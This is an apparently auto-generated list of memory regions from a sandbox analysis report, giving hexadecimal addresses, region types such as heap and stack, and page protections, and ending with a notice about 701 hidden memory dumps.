trusted library allocation
page read and write
736E000
stack
page read and write
2F2F000
stack
page read and write
6EFC000
stack
page read and write
7182000
heap
page read and write
61FE000
stack
page read and write
29636702000
heap
page read and write
5B57000
trusted library allocation
page read and write
29635C40000
heap
page read and write
AC0FAFE000
unkown
page readonly
7250000
heap
page execute and read and write
5F1E000
stack
page read and write
3870000
heap
page read and write
6F8000
heap
page read and write
AC100FE000
unkown
page readonly
2963730A000
heap
page read and write
6D88000
heap
page read and write
2963B420000
trusted library allocation
page read and write
7C35000
trusted library allocation
page read and write
356C000
heap
page read and write
32F9000
stack
page read and write
4950000
heap
page read and write
29637258000
heap
page read and write
6D3D000
stack
page read and write
4BBD000
trusted library allocation
page read and write
67E7000
heap
page read and write
6F20000
trusted library allocation
page read and write
350F000
heap
page read and write
353A000
heap
page read and write
296372FA000
heap
page read and write
29635F02000
heap
page read and write
6C0E000
stack
page read and write
6835000
heap
page read and write
3850000
heap
page read and write
4B53000
trusted library allocation
page read and write
6D28000
heap
page read and write
358C000
heap
page read and write
4589000
trusted library allocation
page read and write
67D8000
heap
page read and write
70E0000
trusted library allocation
page read and write
6FEE000
stack
page read and write
71ED000
heap
page read and write
67D2000
heap
page read and write
29F9000
heap
page read and write
793000
heap
page read and write
7040000
trusted library allocation
page execute and read and write
6A7000
heap
page read and write
AC0FA7E000
stack
page read and write
7030000
trusted library allocation
page read and write
6D2F000
heap
page read and write
7164000
heap
page read and write
4AE0000
heap
page execute and read and write
7AF0000
heap
page read and write
7282000
trusted library allocation
page read and write
350A000
heap
page read and write
2963B550000
trusted library allocation
page read and write
7460000
trusted library allocation
page read and write
AC0F5FE000
unkown
page readonly
29636D20000
trusted library allocation
page read and write
29635D50000
trusted library allocation
page read and write
AC10DFE000
unkown
page readonly
7E60000
trusted library allocation
page read and write
4160000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page execute and read and write
3594000
heap
page read and write
5A9F000
stack
page read and write
6ED0000
trusted library allocation
page read and write
5D7E000
stack
page read and write
6FAE000
stack
page read and write
40B0000
heap
page read and write
29EF000
heap
page read and write
4875000
trusted library allocation
page execute and read and write
7480000
trusted library allocation
page execute and read and write
29636713000
heap
page read and write
6C80000
heap
page read and write
6D36000
heap
page read and write
350A000
heap
page read and write
2946000
heap
page read and write
2C5D000
heap
page read and write
71E5000
heap
page read and write
67D6000
heap
page read and write
2963B470000
trusted library allocation
page read and write
29636700000
heap
page read and write
AC101FE000
stack
page read and write
29637300000
heap
page read and write
AC1037E000
stack
page read and write
353A000
heap
page read and write
599E000
stack
page read and write
711F000
stack
page read and write
6DDE000
heap
page read and write
67EA000
heap
page read and write
819C000
stack
page read and write
724000
trusted library allocation
page read and write
682F000
heap
page read and write
5C2B000
stack
page read and write
4890000
trusted library allocation
page read and write
29C5000
heap
page read and write
AC1007E000
stack
page read and write
6D99000
heap
page read and write
67AB000
stack
page read and write
29635E8A000
heap
page read and write
7050000
trusted library allocation
page read and write
34F1000
heap
page read and write
67ED000
heap
page read and write
710000
trusted library allocation
page read and write
6835000
heap
page read and write
34FE000
heap
page read and write
5364000
heap
page read and write
7F530000
trusted library allocation
page execute and read and write
4DE5000
trusted library allocation
page read and write
536F000
heap
page read and write
2963C000000
heap
page read and write
6D05000
heap
page read and write
29636801000
trusted library allocation
page read and write
7150000
heap
page read and write
34DE000
heap
page read and write
353A000
heap
page read and write
2963730D000
heap
page read and write
664E000
stack
page read and write
4AF1000
trusted library allocation
page read and write
6C7B000
stack
page read and write
351B000
heap
page read and write
7170000
heap
page read and write
67F6000
heap
page read and write
296371F0000
trusted library allocation
page read and write
683A000
heap
page read and write
5E80000
heap
page read and write
682A000
heap
page read and write
29635EA6000
heap
page read and write
296372F6000
heap
page read and write
6D88000
heap
page read and write
2805000
heap
page read and write
6CC2000
heap
page read and write
42D8000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
There are 701 hidden memdumps, click here to show them.